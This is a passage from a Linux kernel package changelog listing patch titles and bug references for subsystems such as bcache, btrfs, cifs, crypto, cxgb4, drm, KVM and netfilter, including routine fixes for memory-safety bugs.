bcache: Replace bch_read_string_list() by __sysfs_match_string()\n (bsc#1130972).\n - bcache: replace hard coded number with BUCKET_GC_GEN_MAX (bsc#1130972).\n - bcache: replace '%pF' by '%pS' in seq_printf() (bsc#1130972).\n - bcache: replace printk() by pr_*() routines (bsc#1130972).\n - bcache: replace Symbolic permissions by octal permission numbers\n (bsc#1130972).\n - bcache: set writeback_percent in a flexible range (bsc#1130972).\n - bcache: split combined if-condition code into separate ones\n (bsc#1130972).\n - bcache: stop bcache device when backing device is offline (bsc#1130972).\n - bcache: stop using the deprecated get_seconds() (bsc#1130972).\n - bcache: style fixes for lines over 80 characters (bsc#1130972).\n - bcache: style fix to add a blank line after declarations (bsc#1130972).\n - bcache: style fix to replace 'unsigned' by 'unsigned int' (bsc#1130972).\n - bcache: treat stale && dirty keys as bad keys (bsc#1130972).\n - bcache: trivial - remove tailing backslash in macro BTREE_FLAG\n (bsc#1130972).\n - bcache: update comment for bch_data_insert (bsc#1130972).\n - bcache: update comment in sysfs.c (bsc#1130972).\n - bcache: use MAX_CACHES_PER_SET instead of magic number 8 in\n __bch_bucket_alloc_set (bsc#1130972).\n - bcache: use (REQ_META|REQ_PRIO) to indicate bio for metadata\n (bsc#1130972).\n - bcache: use REQ_PRIO to indicate bio for metadata (bsc#1130972).\n - bcache: use routines from lib/crc64.c for CRC64 calculation\n (bsc#1130972).\n - bcache: use sysfs_strtoul_bool() to set bit-field variables\n (bsc#1130972).\n - blkcg: Introduce blkg_root_lookup() (bsc#1131673).\n - blkcg: Make blkg_root_lookup() work for queues in bypass mode\n (bsc#1131673).\n - blk-mq: adjust debugfs and sysfs register when updating nr_hw_queues\n (bsc#1131673).\n - blk-mq: Avoid that submitting a bio concurrently with device removal\n triggers a crash (bsc#1131673).\n - blk-mq: change gfp flags to GFP_NOIO in blk_mq_realloc_hw_ctxs\n (bsc#1131673).\n - blk-mq: fallback to previous nr_hw_queues when updating fails\n (bsc#1131673).\n - blk-mq: init hctx sched after update ctx and hctx mapping (bsc#1131673).\n - blk-mq: realloc hctx when hw queue is mapped to another node\n (bsc#1131673).\n - blk-mq: sync the update nr_hw_queues with blk_mq_queue_tag_busy_iter\n (bsc#1131673).\n - block: check_events: do not bother with events if unsupported\n (bsc#1110946, bsc#1119843).\n - block: disk_events: introduce event flags (bsc#1110946, bsc#1119843).\n - block: Ensure that a request queue is dissociated from the cgroup\n controller (bsc#1131673).\n - block: Fix a race between request queue removal and the block cgroup\n controller (bsc#1131673).\n - block: Introduce blk_exit_queue() (bsc#1131673).\n - block: kABI fixes for bio_rewind_iter() removal (bsc#1131673).\n - block: remove bio_rewind_iter() (bsc#1131673).\n - bluetooth: Align minimum encryption key size for LE and BR/EDR\n connections (bsc#1051510).\n - bluetooth: btusb: request wake pin with NOAUTOEN (bsc#1051510).\n - bluetooth: Check L2CAP option sizes returned from l2cap_get_conf_opt\n (bsc#1051510).\n - bluetooth: hci_uart: Check if socket buffer is ERR_PTR in h4_recv_buf()\n (bsc#1133731).\n - bluetooth: hidp: fix buffer overflow (bsc#1051510).\n - bnxt_en: Drop oversize TX packets to prevent errors\n (networking-stable-19_03_07).\n - bonding: fix PACKET_ORIGDEV regression (git-fixes).\n - bpf: fix use after free in bpf_evict_inode (bsc#1083647).\n - brcm80211: potential NULL dereference in\n brcmf_cfg80211_vndr_cmds_dcmd_handler() (bsc#1051510).\n - btrfs: add a helper to return a head ref (bsc#1134813).\n - btrfs: Avoid possible qgroup_rsv_size overflow in\n btrfs_calculate_inode_block_rsv_size (git-fixes).\n - btrfs: breakout empty head cleanup to a helper (bsc#1134813).\n - btrfs: check for refs on snapshot delete resume (bsc#1131335).\n - btrfs: delayed-ref: Introduce better documented delayed ref structures\n (bsc#1063638 bsc#1128052 bsc#1108838).\n - btrfs: Do not panic when we can't find a root key (bsc#1112063).\n - btrfs: extent-tree: Open-code process_func in __btrfs_mod_ref\n (bsc#1063638 bsc#1128052 bsc#1108838).\n - btrfs: Factor out common delayed refs init code (bsc#1134813).\n - btrfs: fix assertion failure on fsync with NO_HOLES enabled\n (bsc#1131848).\n - btrfs: Fix bound checking in qgroup_trace_new_subtree_blocks (git-fixes).\n - btrfs: fix incorrect file size after shrinking truncate and fsync\n (bsc#1130195).\n - btrfs: Introduce init_delayed_ref_head (bsc#1134813).\n - btrfs: move all ref head cleanup to the helper function (bsc#1134813).\n - btrfs: move extent_op cleanup to a helper (bsc#1134813).\n - btrfs: move ref_mod modification into the if (ref) logic (bsc#1134813).\n - btrfs: Open-code add_delayed_data_ref (bsc#1134813).\n - btrfs: Open-code add_delayed_tree_ref (bsc#1134813).\n - btrfs: qgroup: Move reserved data accounting from btrfs_delayed_ref_head\n to btrfs_qgroup_extent_record (bsc#1134162).\n - btrfs: qgroup: Remove duplicated trace points for qgroup_rsv_add/release\n (bsc#1134160).\n - btrfs: remove delayed_ref_node from ref_head (bsc#1134813).\n - btrfs: remove WARN_ON in log_dir_items (bsc#1131847).\n - btrfs: save drop_progress if we drop refs at all (bsc#1131336).\n - btrfs: split delayed ref head initialization and addition (bsc#1134813).\n - btrfs: track refs in a rb_tree instead of a list (bsc#1134813).\n - btrfs: Use init_delayed_ref_common in add_delayed_data_ref (bsc#1134813).\n - btrfs: Use init_delayed_ref_common in add_delayed_tree_ref (bsc#1134813).\n - btrfs: Use init_delayed_ref_head in add_delayed_ref_head (bsc#1134813).\n - cdrom: Fix race condition in cdrom_sysctl_register (bsc#1051510).\n - ceph: ensure d_name stability in ceph_dentry_hash() (bsc#1134461).\n - ceph: fix ci->i_head_snapc leak (bsc#1122776).\n - ceph: fix use-after-free on symlink traversal (bsc#1134459).\n - ceph: only use d_name directly when parent is locked (bsc#1134460).\n - cgroup: fix parsing empty mount option string (bsc#1133094).\n - cifs: Do not count -ENODATA as failure for query directory (bsc#1051510).\n - cifs: do not dereference smb_file_target before null check (bsc#1051510).\n - cifs: Do not hide EINTR after sending network packets (bsc#1051510).\n - cifs: Do not reconnect TCP session in add_credits() (bsc#1051510).\n - cifs: Do not reset lease state to NONE on lease break (bsc#1051510).\n - cifs: Fix adjustment of credits for MTU requests (bsc#1051510).\n - cifs: Fix credit calculation for encrypted reads with errors\n (bsc#1051510).\n - cifs: Fix credits calculations for reads with errors (bsc#1051510).\n - cifs: fix POSIX lock leak and invalid ptr deref (bsc#1114542).\n - cifs: Fix possible hang during async MTU reads and writes (bsc#1051510).\n - cifs: Fix potential OOB access of lock element array (bsc#1051510).\n - cifs: Fix read after write for files with read caching (bsc#1051510).\n - clk: fractional-divider: check parent rate only if flag is set\n (bsc#1051510).\n - clk: rockchip: fix frac settings of GPLL clock for rk3328 (bsc#1051510).\n - clk: rockchip: Fix video codec clocks on rk3288 (bsc#1051510).\n - clk: rockchip: fix wrong clock definitions for rk3328 (bsc#1051510).\n - clk: x86: Add system specific quirk to mark clocks as critical\n (bsc#1051510).\n - cpupowerutils: bench - Fix cpu online check (bsc#1051510).\n - cpu/speculation: Add 'mitigations=' cmdline option (bsc#1112178).\n - crypto: arm/aes-neonbs - do not access already-freed walk.iv\n (bsc#1051510).\n - crypto: caam - add missing put_device() call (bsc#1129770).\n - crypto: ccm - fix incompatibility between "ccm" and "ccm_base"\n (bsc#1051510).\n - crypto: ccp - Do not free psp_master when PLATFORM_INIT fails\n (bsc#1051510).\n - crypto: chacha20poly1305 - set cra_name correctly (bsc#1051510).\n - crypto: crct10dif-generic - fix use via crypto_shash_digest()\n (bsc#1051510).\n - crypto: crypto4xx - properly set IV after de- and encrypt (bsc#1051510).\n - crypto: fips - Grammar s/options/option/, s/to/the/ (bsc#1051510).\n - crypto: gcm - fix incompatibility between "gcm" and "gcm_base"\n (bsc#1051510).\n - crypto: pcbc - remove bogus memcpy()s with src == dest (bsc#1051510).\n - crypto: sha256/arm - fix crash bug in Thumb2 build (bsc#1051510).\n - crypto: sha512/arm - fix crash bug in Thumb2 build (bsc#1051510).\n - crypto: skcipher - do not WARN on unprocessed data after slow walk step\n (bsc#1051510).\n - crypto: sun4i-ss - Fix invalid calculation of hash end (bsc#1051510).\n - crypto: vmx - fix copy-paste error in CTR mode (bsc#1051510).\n - crypto: x86/crct10dif-pcl - fix use via crypto_shash_digest()\n (bsc#1051510).\n - crypto: x86/poly1305 - fix overflow during partial reduction\n (bsc#1051510).\n - cxgb4: Add capability to get/set SGE Doorbell Queue Timer Tick\n (bsc#1127371).\n - cxgb4: Added missing break in ndo_udp_tunnel_{add/del} (bsc#1127371).\n - cxgb4: Add flag tc_flower_initialized (bsc#1127371).\n - cxgb4: Add new T5 PCI device id 0x50ae (bsc#1127371).\n - cxgb4: Add new T5 PCI device ids 0x50af and 0x50b0 (bsc#1127371).\n - cxgb4: Add new T6 PCI device ids 0x608a (bsc#1127371).\n - cxgb4: add per rx-queue counter for packet errors (bsc#1127371).\n - cxgb4: Add support for FW_ETH_TX_PKT_VM_WR (bsc#1127371).\n - cxgb4: add support to display DCB info (bsc#1127371).\n - cxgb4: Add support to read actual provisioned resources (bsc#1127371).\n - cxgb4: collect ASIC LA dumps from ULP TX (bsc#1127371).\n - cxgb4: collect hardware queue descriptors (bsc#1127371).\n - cxgb4: collect number of free PSTRUCT page pointers (bsc#1127371).\n - cxgb4: convert flower table to use rhashtable (bsc#1127371).\n - cxgb4: cxgb4: use FW_PORT_ACTION_L1_CFG32 for 32 bit capability\n (bsc#1127371).\n - cxgb4/cxgb4vf: Add support for SGE doorbell queue timer (bsc#1127371).\n - cxgb4/cxgb4vf: Fix mac_hlist initialization and free (bsc#1127374).\n - cxgb4/cxgb4vf: Link management changes (bsc#1127371).\n - cxgb4/cxgb4vf: Program hash region for {t4/t4vf}_change_mac()\n (bsc#1127371).\n - cxgb4: display number of rx and tx pages free (bsc#1127371).\n - cxgb4: do not return DUPLEX_UNKNOWN when link is down (bsc#1127371).\n - cxgb4: Export sge_host_page_size to ulds (bsc#1127371).\n - cxgb4: fix the error path of cxgb4_uld_register() (bsc#1127371).\n - cxgb4: impose mandatory VLAN usage when non-zero TAG ID (bsc#1127371).\n - cxgb4: Mask out interrupts that are not enabled (bsc#1127175).\n - cxgb4: move Tx/Rx free pages collection to common code (bsc#1127371).\n - cxgb4: remove redundant assignment to vlan_cmd.dropnovlan_fm\n (bsc#1127371).\n - cxgb4: Remove SGE_HOST_PAGE_SIZE dependency on page size (bsc#1127371).\n - cxgb4: remove the unneeded locks (bsc#1127371).\n - cxgb4: specify IQTYPE in fw_iq_cmd (bsc#1127371).\n - cxgb4: Support ethtool private flags (bsc#1127371).\n - cxgb4: update supported DCB version (bsc#1127371).\n - cxgb4: use new fw interface to get the VIN and smt index (bsc#1127371).\n - cxgb4vf: Few more link management changes (bsc#1127374).\n - cxgb4vf: fix memleak in mac_hlist initialization (bsc#1127374).\n - cxgb4vf: Update port information in cxgb4vf_open() (bsc#1127374).\n - device_cgroup: fix RCU imbalance in error case (bsc#1051510).\n - Disable kgdboc failed by echo space to\n /sys/module/kgdboc/parameters/kgdboc (bsc#1051510).\n - dmaengine: axi-dmac: Do not check the number of frames for alignment\n (bsc#1051510).\n - dmaengine: imx-dma: fix warning comparison of distinct pointer types\n (bsc#1051510).\n - dmaengine: qcom_hidma: assign channel cookie correctly (bsc#1051510).\n - dmaengine: sh: rcar-dmac: With cyclic DMA residue 0 is valid\n (bsc#1051510).\n - dmaengine: tegra210-dma: free dma controller in remove() (bsc#1051510).\n - dmaengine: tegra: avoid overflow of byte tracking (bsc#1051510).\n - dm: disable DISCARD if the underlying storage no longer supports it\n (bsc#1114638).\n - drivers: hv: vmbus: Offload the handling of channels to two workqueues\n (bsc#1130567).\n - drivers: hv: vmbus: Reset the channel callback in\n vmbus_onoffer_rescind() (bsc#1130567).\n - drm: Auto-set allow_fb_modifiers when given modifiers at plane init\n (bsc#1051510).\n - drm: bridge: dw-hdmi: Fix overflow workaround for Rockchip SoCs\n (bsc#1113722)\n - drm/dp/mst: Configure no_stop_bit correctly for remote i2c xfers\n (bsc#1051510).\n - drm/fb-helper: dpms_legacy(): Only set on connectors in use\n (bsc#1051510).\n - drm/i915: Fix I915_EXEC_RING_MASK (bsc#1051510).\n - drm/i915/gvt: Add in context mmio 0x20D8 to gen9 mmio list (bsc#1113722)\n - drm/i915/gvt: Annotate iomem usage (bsc#1051510).\n - drm/i915/gvt: do not deliver a workload if its creation fails\n (bsc#1051510).\n - drm/i915/gvt: do not let pin count of shadow mm go negative (bsc#1113722)\n - drm/i915/gvt: Fix incorrect mask of mmio 0x22028 in gen8/9 mmio list\n (bnc#1113722)\n - drm/i915/gvt: Fix MI_FLUSH_DW parsing with correct index check\n (bsc#1051510).\n - drm/mediatek: Fix an error code in mtk_hdmi_dt_parse_pdata()\n (bsc#1113722)\n - drm/mediatek: fix possible object reference leak (bsc#1051510).\n - drm/meson: add size and alignment requirements for dumb buffers\n (bnc#1113722)\n - drm/meson: Fix invalid pointer in meson_drv_unbind() (bsc#1051510).\n - drm/meson: Uninstall IRQ handler (bsc#1051510).\n - drm/nouveau: Stop using drm_crtc_force_disable (bsc#1051510).\n - drm/nouveau/volt/gf117: fix speedo readout register (bsc#1051510).\n - drm/rockchip: shutdown drm subsystem on shutdown (bsc#1051510).\n - drm/rockchip: vop: reset scale mode when win is disabled (bsc#1113722)\n - drm/sun4i: Add missing drm_atomic_helper_shutdown at driver unbind\n (bsc#1113722)\n - drm/sun4i: Fix component unbinding and component master deletion\n (bsc#1113722)\n - drm/sun4i: rgb: Change the pixel clock validation check (bnc#1113722)\n - drm/sun4i: Set device driver data at bind time for use in unbind\n (bsc#1113722)\n - drm/sun4i: Unbind components before releasing DRM and memory\n (bsc#1113722)\n - drm/ttm: Remove warning about inconsistent mapping information\n (bnc#1131488)\n - drm/udl: add a release method and delay modeset teardown (bsc#1085536)\n - drm/vc4: Fix memory leak during gpu reset. (bsc#1113722)\n - dsa: mv88e6xxx: Ensure all pending interrupts are handled prior to exit\n (networking-stable-19_02_20).\n - dt-bindings: net: Fix a typo in the phy-mode list for ethernet bindings\n (bsc#1129770).\n - dwc2: gadget: Fix completed transfer size calculation in DDMA\n (bsc#1051510).\n - e1000e: fix cyclic resets at link up with active tx (bsc#1051510).\n - e1000e: Fix -Wformat-truncation warnings (bsc#1051510).\n - ext2: Fix underflow in ext2_max_size() (bsc#1131174).\n - ext4: add mask of ext4 flags to swap (bsc#1131170).\n - ext4: add missing brelse() in add_new_gdb_meta_bg() (bsc#1131176).\n - ext4: brelse all indirect buffer in ext4_ind_remove_space()\n (bsc#1131173).\n - ext4: cleanup bh release code in ext4_ind_remove_space() (bsc#1131851).\n - ext4: cleanup pagecache before swap i_data (bsc#1131178).\n - ext4: fix check of inode in swap_inode_boot_loader (bsc#1131177).\n - ext4: fix data corruption caused by unaligned direct AIO (bsc#1131172).\n - ext4: fix EXT4_IOC_SWAP_BOOT (bsc#1131180).\n - ext4: fix NULL pointer dereference while journal is aborted\n (bsc#1131171).\n - ext4: update quota information while swapping boot loader inode\n (bsc#1131179).\n - fbdev: fbmem: fix memory access if logo is bigger than the screen\n (bsc#1051510).\n - fix cgroup_do_mount() handling of failure exits (bsc#1133095).\n - Fix kabi after "md: batch flush requests." (bsc#1119680).\n - Fix struct page kABI after adding atomic for ppc (bsc#1131326,\n bsc#1108937).\n - fm10k: Fix a potential NULL pointer dereference (bsc#1051510).\n - fs: avoid fdput() after failed fdget() in vfs_dedupe_file_range()\n (bsc#1132384, bsc#1132219).\n - fs/nfs: Fix nfs_parse_devname to not modify it's argument (git-fixes).\n - futex: Cure exit race (bsc#1050549).\n - futex: Ensure that futex address is aligned in handle_futex_death()\n (bsc#1050549).\n - futex: Handle early deadlock return correctly (bsc#1050549).\n - ghes, EDAC: Fix ghes_edac registration (bsc#1133176).\n - gpio: adnp: Fix testing wrong value in adnp_gpio_direction_input\n (bsc#1051510).\n - gpio: aspeed: fix a potential NULL pointer dereference (bsc#1051510).\n - gpio: gpio-omap: fix level interrupt idling (bsc#1051510).\n - gpio: of: Fix of_gpiochip_add() error path (bsc#1051510).\n - gre6: use log_ecn_error module parameter in ip6_tnl_rcv() (git-fixes).\n - hid: debug: fix race condition with between rdesc_show() and device\n removal (bsc#1051510).\n - hid: i2c-hid: Ignore input report if there's no data present on Elan\n touchpanels (bsc#1133486).\n - hid: input: add mapping for Assistant key (bsc#1051510).\n - hid: intel-ish-hid: avoid binding wrong ishtp_cl_device (bsc#1051510).\n - hid: intel-ish: ipc: handle PIMR before ish_wakeup also clear PISR\n busy_clear bit (bsc#1051510).\n - hid: logitech: check the return value of create_singlethread_workqueue\n (bsc#1051510).\n - hv_netvsc: Fix IP header checksum for coalesced packets\n (networking-stable-19_03_07).\n - hwmon: (f71805f) Use request_muxed_region for Super-IO accesses\n (bsc#1051510).\n - hwmon: (pc87427) Use request_muxed_region for Super-IO accesses\n (bsc#1051510).\n - hwmon: (smsc47b397) Use request_muxed_region for Super-IO accesses\n (bsc#1051510).\n - hwmon: (smsc47m1) Use request_muxed_region for Super-IO accesses\n (bsc#1051510).\n - hwmon: (vt1211) Use request_muxed_region for Super-IO accesses\n (bsc#1051510).\n - hwmon: (w83627hf) Use request_muxed_region for Super-IO accesses\n (bsc#1051510).\n - hwrng: virtio - Avoid repeated init of completion (bsc#1051510).\n - i2c: Make i2c_unregister_device() NULL-aware (bsc#1108193).\n - ibmvnic: Enable GRO (bsc#1132227).\n - ibmvnic: Fix completion structure initialization (bsc#1131659).\n - ibmvnic: Fix netdev feature clobbering during a reset (bsc#1132227).\n - iio: adc: at91: disable adc channel interrupt in timeout case\n (bsc#1051510).\n - iio: adc: fix warning in Qualcomm PM8xxx HK/XOADC driver (bsc#1051510).\n - iio: ad_sigma_delta: select channel when reading register (bsc#1051510).\n - iio: core: fix a possible circular locking dependency (bsc#1051510).\n - iio: cros_ec: Fix the maths for gyro scale calculation (bsc#1051510).\n - iio: dac: mcp4725: add missing powerdown bits in store eeprom\n (bsc#1051510).\n - iio: Fix scan mask selection (bsc#1051510).\n - iio/gyro/bmg160: Use millidegrees for temperature scale (bsc#1051510).\n - iio: gyro: mpu3050: fix chip ID reading (bsc#1051510).\n - Input: introduce KEY_ASSISTANT (bsc#1051510).\n - Input: snvs_pwrkey - initialize necessary driver data before enabling\n IRQ (bsc#1051510).\n - Input: synaptics-rmi4 - write config register values to the right offset\n (bsc#1051510).\n - intel_idle: add support for Jacobsville (jsc#SLE-5394).\n - intel_th: msu: Fix single mode with IOMMU (bsc#1051510).\n - intel_th: pci: Add Comet Lake support (bsc#1051510).\n - io: accel: kxcjk1013: restore the range after resume (bsc#1051510).\n - iommu/amd: Set exclusion range correctly (bsc#1130425).\n - iommu/vt-d: Do not request page request irq under dmar_global_lock\n (bsc#1135006).\n - iommu/vt-d: Make kernel parameter igfx_off work with vIOMMU\n (bsc#1135007).\n - iommu/vt-d: Set intel_iommu_gfx_mapped correctly (bsc#1135008).\n - ip6_tunnel: fix ip6 tunnel lookup in collect_md mode (git-fixes).\n - ipmi: Fix I2C client removal in the SSIF driver (bsc#1108193).\n - ipmi:ssif: compare block number correctly for multi-part return messages\n (bsc#1051510).\n - ipmi_ssif: Remove duplicate NULL check (bsc#1108193).\n - ipv4: Return error for RTA_VIA attribute (networking-stable-19_03_07).\n - ipv6: Fix dangling pointer when ipv6 fragment (git-fixes).\n - ipv6: propagate genlmsg_reply return code (networking-stable-19_02_24).\n - ipv6: Return error for RTA_VIA attribute (networking-stable-19_03_07).\n - ipv6: sit: reset ip header pointer in ipip6_rcv (git-fixes).\n - ipvlan: disallow userns cap_net_admin to change global mode/flags\n (networking-stable-19_03_15).\n - ipvs: remove IPS_NAT_MASK check to fix passive FTP (git-fixes).\n - It's wrong to add len to sector_nr in raid10 reshape twice (git-fixes).\n - iw_cxgb4: cq/qp mask depends on bar2 pages in a host page (bsc#1127371).\n - iwiwifi: fix bad monitor buffer register addresses (bsc#1129770).\n - iwlwifi: fix send hcmd timeout recovery flow (bsc#1129770).\n - jbd2: clear dirty flag when revoking a buffer from an older transaction\n (bsc#1131167).\n - jbd2: fix compile warning when using JBUFFER_TRACE (bsc#1131168).\n - kABI: restore icmp_send (kabi).\n - kabi/severities: add cxgb4 and cxgb4vf shared data to the whitelis\n (bsc#1127372)\n - kABI workaround for removed usb_interface.pm_usage_cnt field\n (bsc#1051510).\n - kABI workaround for snd_seq_kernel_client_enqueue() API changes\n (bsc#1051510).\n - kbuild: modversions: Fix relative CRC byte order interpretation\n (bsc#1131290).\n - kbuild: strip whitespace in cmd_record_mcount findstring (bsc#1065729).\n - kcm: switch order of device registration to fix a crash (bnc#1130527).\n - kernel/sysctl.c: add missing range check in do_proc_dointvec_minmax_conv\n (bsc#1051510).\n - kernel/sysctl.c: fix out-of-bounds access when setting file-max\n (bsc#1051510).\n - kernfs: do not set dentry->d_fsdata (boo#1133115).\n - KEYS: always initialize keyring_index_key::desc_len (bsc#1051510).\n - KEYS: user: Align the payload buffer (bsc#1051510).\n - KVM: Call kvm_arch_memslots_updated() before updating memslots\n (bsc#1132563).\n - KVM: Fix kABI for AMD SMAP Errata workaround (bsc#1133149).\n - KVM: Fix UAF in nested posted interrupt processing (bsc#1134199).\n - KVM: nVMX: Apply addr size mask to effective address for VMX\n instructions (bsc#1132561).\n - KVM: nVMX: Clear reserved bits of #DB exit qualification (bsc#1134200).\n - KVM: nVMX: Ignore limit checks on VMX instructions using flat segments\n (bsc#1132564).\n - KVM: nVMX: restore host state in nested_vmx_vmexit for VMFail\n (bsc#1134201).\n - KVM: nVMX: Sign extend displacements of VMX instr's mem operands\n (bsc#1132562).\n - KVM: PPC: Book3S HV: Fix race between kvm_unmap_hva_range and MMU mode\n switch (bsc#1061840).\n - KVM: SVM: Workaround errata#1096 (insn_len maybe zero on SMAP violation)\n (bsc#1133149).\n - KVM: VMX: Compare only a single byte for VMCS' "launched" in vCPU-run\n (bsc#1132555).\n - KVM: VMX: Zero out *all* general purpose registers after VM-Exit\n (bsc#1134202).\n - KVM: x86: Always use 32-bit SMRAM save state for 32-bit kernels\n (bsc#1134203).\n - KVM: x86: Do not clear EFER during SMM transitions for 32-bit vCPU\n (bsc#1134204).\n - KVM: x86: Emulate MSR_IA32_ARCH_CAPABILITIES on AMD hosts (bsc#1114279).\n - KVM: x86/mmu: Detect MMIO generation wrap in any address space\n (bsc#1132570).\n - KVM: x86/mmu: Do not cache MMIO accesses while memslots are in flux\n (bsc#1132571).\n - kvm: x86: Report STIBP on GET_SUPPORTED_CPUID (bsc#1111331).\n - KVM: x86: svm: make sure NMI is injected after nmi_singlestep\n (bsc#1134205).\n - leds: avoid races with workqueue (bsc#1051510).\n - leds: pca9532: fix a potential NULL pointer dereference (bsc#1051510).\n - lib: add crc64 calculation routines (bsc#1130972).\n - libata: fix using DMA buffers on stack (bsc#1051510).\n - lib: do not depend on linux headers being installed (bsc#1130972).\n - lightnvm: if LUNs are already allocated fix return (bsc#1085535).\n - linux/kernel.h: Use parentheses around argument in u64_to_user_ptr()\n (bsc#1051510).\n - Linux v5.0-rc7: bcm2835 MMC issues (bsc#1070872).\n - locking/atomics, asm-generic: Move some macros from <linux/bitops.h> to\n a new <linux/bits.h> file (bsc#1111331).\n - lpfc: validate command in lpfc_sli4_scmd_to_wqidx_distr() (bsc#1129138).\n - mac80211: do not call driver wake_tx_queue op during reconfig\n (bsc#1051510).\n - md: batch flush requests (bsc#1119680).\n - md: Fix failed allocation of md_register_thread (git-fixes).\n - md/raid1: do not clear bitmap bits on interrupted recovery (git-fixes).\n - md/raid5: fix 'out of memory' during raid cache recovery (git-fixes).\n - media: cx18: update *pos correctly in cx18_read_pos() (bsc#1051510).\n - media: cx23885: check allocation return (bsc#1051510).\n - media: davinci-isif: avoid uninitialized variable use (bsc#1051510).\n - media: ivtv: update *pos correctly in ivtv_read_pos() (bsc#1051510).\n - media: mt9m111: set initial frame size other than 0x0 (bsc#1051510).\n - media: mtk-jpeg: Correct return type for mem2mem buffer helpers\n (bsc#1051510).\n - media: mx2_emmaprp: Correct return type for mem2mem buffer helpers\n (bsc#1051510).\n - media: ov2659: fix unbalanced mutex_lock/unlock (bsc#1051510).\n - media: pvrusb2: Prevent a buffer overflow (bsc#1129770).\n - media: s5p-g2d: Correct return type for mem2mem buffer helpers\n (bsc#1051510).\n - media: s5p-jpeg: Correct return type for mem2mem buffer helpers\n (bsc#1051510).\n - media: serial_ir: Fix use-after-free in serial_ir_init_module\n (bsc#1051510).\n - media: sh_veu: Correct return type for mem2mem buffer helpers\n (bsc#1051510).\n - media: tw5864: Fix possible NULL pointer dereference in\n tw5864_handle_frame (bsc#1051510).\n - media: vivid: use vfree() instead of kfree() for dev->bitmap_cap\n (bsc#1051510).\n - media: wl128x: Fix an error code in fm_download_firmware() (bsc#1051510).\n - media: wl128x: prevent two potential buffer overflows (bsc#1051510).\n - mISDN: hfcpci: Test both vendor & device ID for Digium HFC4S\n (bsc#1051510).\n - missing barriers in some of unix_sock ->addr and ->path accesses\n (networking-stable-19_03_15).\n - mmc: core: fix possible use after free of host (bsc#1051510).\n - mmc: davinci: remove extraneous __init annotation (bsc#1051510).\n - mmc: sdhci: Fix data command CRC error handling (bsc#1051510).\n - mmc: sdhci: Handle auto-command errors (bsc#1051510).\n - mmc: sdhci: Rename SDHCI_ACMD12_ERR and SDHCI_INT_ACMD12ERR\n (bsc#1051510).\n - mmc: tmio_mmc_core: do not claim spurious interrupts (bsc#1051510).\n - mm/debug.c: fix __dump_page when mapping->host is not set (bsc#1131934).\n - mm/huge_memory.c: fix modifying of page protection by insert_pfn_pmd()\n (bsc#1126740).\n - mm/page_isolation.c: fix a wrong flag in set_migratetype_isolate()\n (bsc#1131935).\n - mm/vmalloc: fix size check for remap_vmalloc_range_partial()\n (bsc#1133825).\n - mpls: Return error for RTA_GATEWAY attribute\n (networking-stable-19_03_07).\n - mt7601u: bump supported EEPROM version (bsc#1051510).\n - mtd: docg3: fix a possible memory leak of mtd->name (bsc#1051510).\n - mtd: docg3: Fix passing zero to 'PTR_ERR' warning in doc_probe_device\n (bsc#1051510).\n - mtd: nand: omap: Fix comment in platform data using wrong Kconfig symbol\n (bsc#1051510).\n - mtd: part: fix incorrect format specifier for an unsigned long long\n (bsc#1051510).\n - mtd: spi-nor: intel-spi: Avoid crossing 4K address boundary on\n read/write (bsc#1129770).\n - mwifiex: do not advertise IBSS features without FW support (bsc#1129770).\n - mwifiex: Fix mem leak in mwifiex_tm_cmd (bsc#1051510).\n - mwifiex: prevent an array overflow (bsc#1051510).\n - mwl8k: Fix rate_idx underflow (bsc#1051510).\n - net: Add header for usage of fls64() (networking-stable-19_02_20).\n - net: Add __icmp_send helper (networking-stable-19_03_07).\n - net: avoid false positives in untrusted gso validation (git-fixes).\n - net: avoid skb_warn_bad_offload on IS_ERR (git-fixes).\n - net: avoid use IPCB in cipso_v4_error (networking-stable-19_03_07).\n - net: bridge: add vlan_tunnel to bridge port policies (git-fixes).\n - net: bridge: fix per-port af_packet sockets (git-fixes).\n - net: bridge: multicast: use rcu to access port list from\n br_multicast_start_querier (git-fixes).\n - net: datagram: fix unbounded loop in __skb_try_recv_datagram()\n (git-fixes).\n - net: Do not allocate page fragments that are not skb aligned\n (networking-stable-19_02_20).\n - net: dsa: legacy: do not unmask port bitmaps (git-fixes).\n - net: dsa: mv88e6xxx: Fix u64 statistics (networking-stable-19_03_07).\n - netfilter: bridge: ebt_among: add missing match size checks (git-fixes).\n - netfilter: bridge: ebt_among: add more missing match size checks\n (git-fixes).\n - netfilter: bridge: set skb transport_header before entering\n NF_INET_PRE_ROUTING (git-fixes).\n - netfilter: drop template ct when conntrack is skipped (git-fixes).\n - netfilter: ip6t_MASQUERADE: add dependency on conntrack module\n (git-fixes).\n - netfilter: ipset: Missing nfnl_lock()/nfnl_unlock() is added to\n ip_set_net_exit() (git-fixes).\n - netfilter: ipv6: fix use-after-free Write in nf_nat_ipv6_manip_pkt\n (git-fixes).\n - netfilter: nf_socket: Fix out of bounds access in\n nf_sk_lookup_slow_v{4,6} (git-fixes).\n - netfilter: x_tables: avoid out-of-bounds reads in\n xt_request_find_{match|target} (git-fixes).\n - netfilter: x_tables: fix int overflow in xt_alloc_table_info()\n (git-fixes).\n - net: Fix for_each_netdev_feature on Big endian\n (networking-stable-19_02_20).\n - net: fix IPv6 prefix route residue (networking-stable-19_02_20).\n - net: Fix untag for vlan packets without ethernet header (git-fixes).\n - net: Fix vlan untag for bridge and vlan_dev with reorder_hdr off\n (git-fixes).\n - net/hsr: Check skb_put_padto() return value (git-fixes).\n - net: hsr: fix memory leak in hsr_dev_finalize()\n (networking-stable-19_03_15).\n - net/hsr: fix possible crash in add_timer() (networking-stable-19_03_15).\n - net/ibmvnic: Update carrier state after link state change (bsc#1135100).\n - net/ibmvnic: Update MAC address settings after adapter reset\n (bsc#1134760).\n - netlabel: fix out-of-bounds memory accesses (networking-stable-19_03_07).\n - netlink: fix nla_put_{u8,u16,u32} for KASAN (git-fixes).\n - net/mlx5e: Do not overwrite pedit action when multiple pedit used\n (networking-stable-19_02_24).\n - net: nfc: Fix NULL dereference on nfc_llcp_build_tlv fails\n (networking-stable-19_03_07).\n - net/packet: fix 4gb buffer limit due to overflow check\n (networking-stable-19_02_24).\n - net/packet: Set __GFP_NOWARN upon allocation in alloc_pg_vec (git-fixes).\n - net_sched: acquire RTNL in tc_action_net_exit() (git-fixes).\n - net_sched: fix two more memory leaks in cls_tcindex\n (networking-stable-19_02_24).\n - net: Set rtm_table to RT_TABLE_COMPAT for ipv6 for tables > 255\n (networking-stable-19_03_15).\n - net: sit: fix memory leak in sit_init_net() (networking-stable-19_03_07).\n - net: sit: fix UBSAN Undefined behaviour in check_6rd\n (networking-stable-19_03_15).\n - net: 